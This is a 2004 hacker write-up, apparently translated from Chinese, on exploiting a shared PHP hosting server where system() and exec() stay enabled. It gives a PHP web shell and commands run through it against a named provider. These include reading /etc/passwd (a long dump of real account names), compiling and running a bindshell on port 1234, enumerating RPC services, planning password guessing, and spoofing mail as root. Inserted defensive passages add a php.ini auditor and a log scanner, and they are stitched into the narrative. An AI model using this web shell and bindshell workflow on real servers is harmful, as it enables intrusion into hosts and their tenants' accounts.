Attacking a PHP Configuration Weakness
Source: vfocus.net  Author: vitter  Published: 2004-03-23

First of all, the problem with these sites is mainly that they allow functions such as system() and exec(). Anyone familiar with PHP knows that these functions invoke system commands (although, going through the web server, a PHP program only runs with nobody's privileges), and any ordinary user who signs up for hosting space gets partial write permission, so a user can write a web shell program to execute commands. On these servers ordinary users cannot log in, i.e. nologin (no login shell; the admin isn't that "generous"!), so with system(), exec() and the like one can bind a shell~! This article uses Huyi's (www.51.net) hosting space as the example (whether all of their servers have this fault I don't know~ I only tested the server my space is on):
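The weakness described above is a configuration issue on the host's side: the command-execution functions stay callable, and a bare `$cmd` is filled straight from the `?cmd=` query parameter (the `register_globals` behaviour of PHP of that era). As an added example, not code from the original article or from the hosting provider, the following Python script parses a php.ini and reports the three directives a shared host should check: `disable_functions` covering the process-spawning functions, `register_globals` off, and `open_basedir` set. The two ini fragments are constructed samples, not any real server's configuration.

```python
"""Audit a php.ini for the directives behind the attack in the write-up.
Added example, not from the original article; the ini text is constructed."""

# PHP functions that hand a string to the shell or spawn a process.
COMMAND_FUNCTIONS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}


def parse_php_ini(text):
    """Return {directive: value} from php.ini text.

    ';' starts a comment, '[Section]' lines are skipped, and a directive that
    appears twice keeps its last value, which is how PHP itself reads the file.
    """
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("["):
            continue
        if "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip().strip('"')
    return settings


def is_on(value):
    """php.ini boolean: On/1/True/Yes mean on; anything else, including absent, is off."""
    return (value or "").strip().lower() in {"on", "1", "true", "yes"}


def audit(settings):
    """Return human-readable findings; an empty list means all three checks pass."""
    findings = []
    disabled = {f.strip().lower()
                for f in settings.get("disable_functions", "").split(",") if f.strip()}
    still_enabled = sorted(COMMAND_FUNCTIONS - disabled)
    if still_enabled:
        findings.append("disable_functions leaves callable: " + ", ".join(still_enabled))
    if is_on(settings.get("register_globals")):
        findings.append("register_globals is On: ?cmd=... becomes $cmd inside every script")
    if not settings.get("open_basedir"):
        findings.append("open_basedir is unset: scripts may read any file the web-server user can")
    return findings


# Constructed sample: defaults of the era, under which a shell.php3 like the one above works.
WEAK_INI = """
[PHP]
; constructed sample, not a real host's configuration
register_globals = On
disable_functions =
"""

# Constructed sample: the same directives as a shared host should set them.
HARDENED_INI = """
[PHP]
; constructed sample, not a real host's configuration
register_globals = Off
disable_functions = "system,exec,shell_exec,passthru,popen,proc_open"
open_basedir = "/home/example_user/:/tmp/"
"""

if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        result = audit(parse_php_ini(ini))
        print(label, "->", result or ["no findings"])
```

Run it against a real php.ini by passing the file contents to `parse_php_ini`; the audit is deliberately limited to directives whose semantics are stable across PHP 4 and later, so it says nothing about settings it does not understand.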

1. Write a webshell first (easy to do in PHP)
<?php
# shell.php3
# $cmd is filled from the ?cmd= query parameter (register_globals)
echo "<pre>";
system("$cmd");
echo "</pre>";
?>
2. Upload it to the space
3. Execute (the actual server is blurred out)
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=id  (see how much privilege we really have)
uid=171047(xxxx) gid=51(xxx) groups=51(xxx), 65534(nobody)
root really is stingy!
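Every request in this procedure leaves a web-server access-log line with the command sitting in the query string, which is what a hosting operator can watch for. As an added example, not from the original article, the following Python scanner runs over constructed Apache-style log lines and flags requests to PHP scripts whose parameter values read like a shell command line: a first word that is a Unix command name, or shell metacharacters. The command-word list is taken from the requests shown on this page plus a few common ones, and the log lines are constructed after those requests.

```python
"""Flag PHP requests whose query parameters carry shell command lines.
Added example, not from the original article; the log lines are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Apache/NCSA common log format: client ident user [time] "method target proto" status size
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Command names seen in this write-up, plus a few common ones; a legitimate
# application parameter almost never starts with one of these.
COMMAND_WORDS = {"id", "uname", "cat", "set", "whereis", "gcc", "rpcinfo",
                 "ls", "wget", "nc", "sh", "perl"}
# Shell metacharacters, and the /etc/ prefix that appears in the passwd dump above.
META_RE = re.compile(r"[;|&`$]|/etc/")


def looks_like_command(value):
    """True when a decoded parameter value reads like a shell command line."""
    words = value.strip().split()
    if not words:
        return False
    first = words[0].rsplit("/", 1)[-1]  # basename: /usr/sbin/rpcinfo -> rpcinfo
    return first in COMMAND_WORDS or META_RE.search(value) is not None


def scan_access_log(lines):
    """Return (client, script_path, parameter, value) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parseable request line
        parts = urlsplit(m.group("target"))
        if not re.search(r"\.php\d?$", parts.path):  # .php, .php3, .php4 ...
            continue
        # parse_qs percent-decodes and turns '+' into spaces for us
        for name, values in parse_qs(parts.query, keep_blank_values=True).items():
            for value in values:
                if looks_like_command(value):
                    findings.append((m.group("client"), parts.path, name, value))
    return findings


# Constructed sample log, modelled on the requests shown in the write-up.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Mar/2004:10:01:02 +0800] "GET /index.php?page=about HTTP/1.0" 200 512',
    '203.0.113.7 - - [23/Mar/2004:10:01:09 +0800] "GET /cgi-bin/shell.php?cmd=id HTTP/1.0" 200 88',
    '203.0.113.7 - - [23/Mar/2004:10:01:15 +0800] "GET /cgi-bin/shell.php?cmd=uname%20-ras HTTP/1.0" 200 160',
    '203.0.113.7 - - [23/Mar/2004:10:01:31 +0800] "GET /cgi-bin/shell.php?cmd=cat%20/etc/passwd HTTP/1.0" 200 4096',
    '203.0.113.7 - - [23/Mar/2004:10:02:00 +0800] "GET /cgi-bin/shell.php?cmd=set HTTP/1.0" 200 120',
    '198.51.100.2 - - [23/Mar/2004:10:02:30 +0800] "GET /search.php?q=how+to+set+a+table HTTP/1.0" 200 2048',
    '198.51.100.2 - - [23/Mar/2004:10:02:31 +0800] "GET /images/logo.gif HTTP/1.0" 200 9000',
]

if __name__ == "__main__":
    for client, path, name, value in scan_access_log(SAMPLE_LOG):
        print(f"{client} {path} {name}={value!r}")
```

The benign `search.php?q=how+to+set+a+table` line shows why the check looks at the first word rather than anywhere in the value: "set" in the middle of a sentence is not a command. A real deployment would feed the scanner the live access log and treat a single hit on a tenant's script as reason to inspect that account's files.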
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=uname -ras  (check the system)
FreeBSD xxx.51.net 3.3-RELEASE FreeBSD 3.3-RELEASE #11: Tue Mar 20
00:58:09 CST 2001 root@51.net:/usr/src/sys/compile/51NET i386
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/passwd  (shadow is definitely not visible)
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin
bin:*:3:7:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:107353:51:USER:/home/tty:/local/bin/null
kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
news:*:8:8:News Subsystem:/:/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
ftp:*:70:70:FTP Daemon:/nonexistent:/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
quotauser1:*:997:51:quotauser:/home/quotauser1:/sbin/nologin
quotauser2:*:998:51:quotauser:/home/quotauser2:/sbin/nologin
quotauser3:*:999:51:quotauser:/home/quotauser3:/sbin/nologin
tian:*:1002:1002::/local/tian:/local/bin/ksh
sysadmin:*:1001:1001:System Administrator:/local/sysadmin:/local/bin/ksh
test2:*:9999:51::/home/test2:/local/bin/null
xhjj:*:106200:51:USER:/home/xhjj:/sbin/nologin
zhinan:*:106201:51:USER:/home/zhinan:/local/bin/null
yes2:*:106202:51:USER:/home/yes2:/local/bin/null
daboy:*:106203:51:USER:/home/daboy:/local/bin/null
yesky:*:106204:51:USER:/home/yesky:/local/bin/null
yesk:*:106205:51:USER:/home/yesk:/local/bin/null
lnsyzzg:*:106206:51:USER:/home/lnsyzzg:/local/bin/null
fog:*:106207:51:USER:/home/fog:/local/bin/null
renshou:*:106208:51:USER:/home/renshou:/local/bin/null
hilen:*:106209:51:USER:/home/hilen:/local/bin/null
hapybird:*:106210:51:USER:/home/hapybird:/sbin/nologin
xiewei:*:106211:51:USER:/home/xiewei:/sbin/nologin
wwwer:*:106212:51:USER:/home/wwwer:/local/bin/null
larry:*:106213:51:USER:/home/larry:/local/bin/null
sunboys:*:106214:51:USER:/home/sunboys:/local/bin/null
everydayyuki:*:106215:51:USER:/home/everydayyuki:/local/bin/null
linguanxi:*:106216:51:USER:/home/linguanxi:/local/bin/null
baobao:*:106217:51:USER:/home/baobao:/local/bin/null
chaoshan:*:106218:51:USER:/home/chaoshan:/local/bin/null
hrstudio:*:106219:51:USER:/home/hrstudio:/local/bin/null
dengxian:*:106220:51:USER:/home/dengxian:/local/bin/null
simonstone:*:106221:51:USER:/home/simonstone:/local/bin/null
chenjian:*:106222:51:USER:/home/chenjian:/local/bin/null
lvxiangml:*:106223:51:USER:/home/lvxiangml:/local/bin/null
zzbxaxa:*:106224:51:USER:/home/zzbxaxa:/local/bin/null
pc2000:*:106225:51:USER:/home/pc2000:/local/bin/null
startexcel:*:106226:51:USER:/home/startexcel:/local/bin/null
model:*:106227:51:USER:/home/model:/local/bin/null
leogirl:*:106228:51:USER:/home/leogirl:/local/bin/null
fohcn:*:106229:51:USER:/home/fohcn:/local/bin/null
ljok:*:106230:51:USER:/home/ljok:/local/bin/null
baorui:*:106231:51:USER:/home/baorui:/local/bin/null
fky-jack:*:106232:51:USER:/home/fky-jack:/local/bin/null
zhaowen:*:106233:51:USER:/home/zhaowen:/local/bin/null
xiaojiaoya:*:106234:51:USER:/home/xiaojiaoya:/local/bin/null
zyinter:*:106235:51:USER:/home/zyinter:/local/bin/null
power:*:106236:51:USER:/home/power:/local/bin/null
feefan:*:106237:51:USER:/home/feefan:/local/bin/null
paradise:*:106238:51:USER:/home/paradise:/local/bin/null
wulc:*:106239:51:USER:/home/wulc:/local/bin/null
jcm:*:106240:51:USER:/home/jcm:/local/bin/null
liangxiaom:*:106241:51:USER:/home/liangxiaom:/local/bin/null
jingder:*:106242:51:USER:/home/jingder:/local/bin/null
hanjun:*:106243:51:USER:/home/hanjun:/local/bin/null
adai:*:106244:51:USER:/home/adai:/local/bin/null
fightben:*:106245:51:USER:/home/fightben:/local/bin/null
lihonghui-ooo:*:106246:51:USER:/home/lihonghui-ooo:/local/bin/null
xeno:*:106247:51:USER:/home/xeno:/local/bin/null
.................. (too many~ omitted)
Only a few users have a shell they can log in with. cp it to my directory and later pull out the usernames to see whether there is any idiot with username=passwd~ heh heh~

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=set
HOME=/
PS1=$
OPTIND=1
PS2=>
PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin
IFS=
Damn~ what a poor "environment", set up like this....
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=cat /etc/hosts
# $FreeBSD: src/etc/hosts,v 1.9.2.1 1999/08/29 14:18:44 peter Exp $
#
# Host Database
# This file should contain the addresses and aliases
# for local hosts that share this file.
# In the presence of the domain name service or NIS, this file may
# not be consulted at all; see /etc/host.conf for the resolution order.
#
#
127.0.0.1 localhost localhost.my.domain myname.my.domain
#
# Imaginary network.
#10.0.0.2 myname.my.domain myname
#10.0.0.3 myfriend.my.domain myfriend
#
# According to RFC 1918, you can use the following IP networks for
# private nets which will never be connected to the Internet:
#
# 10.0.0.0 - 10.255.255.255
# 172.16.0.0 - 172.31.255.255
# 192.168.0.0 - 192.168.255.255
#
#................................ (the rest is all filler)
Not so small a hosts file~ heh heh~
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=whereis -b gcc
(God willing~ there's gcc)
gcc: /usr/sbin/gcc (hooray!!!!!!!!!!!!)
Let me try~ put a big thing up there and compile it, haha~ so fast!
The webshell is too tiring; binding a shell out is more convenient... (upload a bindshell program; you can write one yourself in perl/C, neither is hard)
lynx http://xxx.51.net/cgi-bin/shell.php?cmd=gcc -o bind bindshell.c

lynx http://xxx.51.net/cgi-bin/shell.php?cmd=./bind 1234
bind shell too port 1234
telnet xxx.51.net 1234
..... the rest omitted; anyway, commands can now be executed
Hmm~ looks like this one doesn't have MySQL installed, a pity~ heh heh~~~~~~~~~, oh right, oso.com.cn's seems to have it~ but it stopped recently.....
lynx http://xxx.51.net/cgi-bin/shell.php...sr/sbin/rpcinfo -p
localhost
portmapper 100000 portmap sunrpc
rstatd 100001 rstat rstat_svc rup perfmeter
rusersd 100002 rusers
nfs 100003 nfsprog
ypserv 100004 ypprog
mountd 100005 mount showmount
ypbind 100007
walld 100008 rwall shutdown
yppasswdd 100009 yppasswd
etherstatd 100010 etherstat
rquotad 100011 rquotaprog quota rquota
sprayd 100012 spray
3270_mapper 100013
rje_mapper 100014
selection_svc 100015 selnsvc
database_svc 100016
rexd 100017 rex
alis 100018
sched 100019
llockmgr 100020
nlockmgr 100021
x25.inr 100022
statmon 100023
status 100024
bootparamd 100026 bootparam
ypupdated 100028 ypupdate
keyserv 100029 keyserver
tfsd 100037
nsed 100038
nsemntd 100039
pcnfsd 150001 pcnfs
amd 300019
cmsd 100068
ttdbserver 100083 tooltalk
Haha~ looks like mount is possible; later I'll showmount from a zombie box and see~ I won't go into that...
Haha~ let's play with mail() a bit
<?php
# mail.php3
mail("xxx@sina.com","hi","i'm Bytes");
?>
Quick, go check the mailbox~~~GOGOGO >>>>..... wow~ not bad~ the sender shows as root@51.net..





 